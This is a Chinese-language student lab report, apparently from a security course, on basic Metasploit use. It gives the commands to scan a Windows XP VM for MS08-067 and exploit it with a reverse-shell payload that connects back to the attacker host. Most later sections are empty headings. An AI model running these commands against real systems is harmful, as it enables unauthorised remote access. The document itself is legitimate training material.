码迷,mamicode.com
首页 > 其他好文 > 详细

20174309徐宁艺 Exp6 MSF基础应用

时间:2020-04-28 14:52:54      阅读:61      评论:0      收藏:0      [点我收藏+]

标签:eric   ports   漏洞   成功   asp   spl   xpl   mic   shel   

一、实践内容

       本实践目标是掌握metasploit的基本应用方式,重点掌握常用的三种攻击方式的思路。

二、实践过程

(一)主动攻击实践

       靶机:WindowsXP,关闭防火墙,IP地址为192.168.152.138。

      攻击机:IP地址为192.168.152.129

       对【ms08_067】

  • 攻击机与靶机能够互相ping通。

技术图片技术图片

  •  攻击机使用指令 nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.152.138 查看靶机的ms08_067漏洞是否存在。可以看到漏洞是存在的

 技术图片

  •  打开msf,查看靶机445端口是否开放,可以看到445端口开放。
search portscan
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.152.138
exploit

技术图片

  •  对靶机进行攻击。可以看到回连成功,输入【ipconfig】验证。
use exploit/windows/smb/ms08_067_netapi 
set payload generic/shell_reverse_tcp
set RHOST 192.168.152.138
set LHOST 192.168.152.129
exploit

技术图片

 (二)针对浏览器的攻击

 

 

(三)针对客户端的攻击

 

 

 

(四)应用辅助模块

 

 

 

三、实践总结

(一)基础问题回答

1.用自己的话解释什么是exploit,payload,encode.

 

(二)总结与体会

 

(三)离实战还缺些什么技术或步骤

技术图片

 

20174309徐宁艺 Exp6 MSF基础应用

标签:eric   ports   漏洞   成功   asp   spl   xpl   mic   shel   

原文地址:https://www.cnblogs.com/20174309xny/p/12781667.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!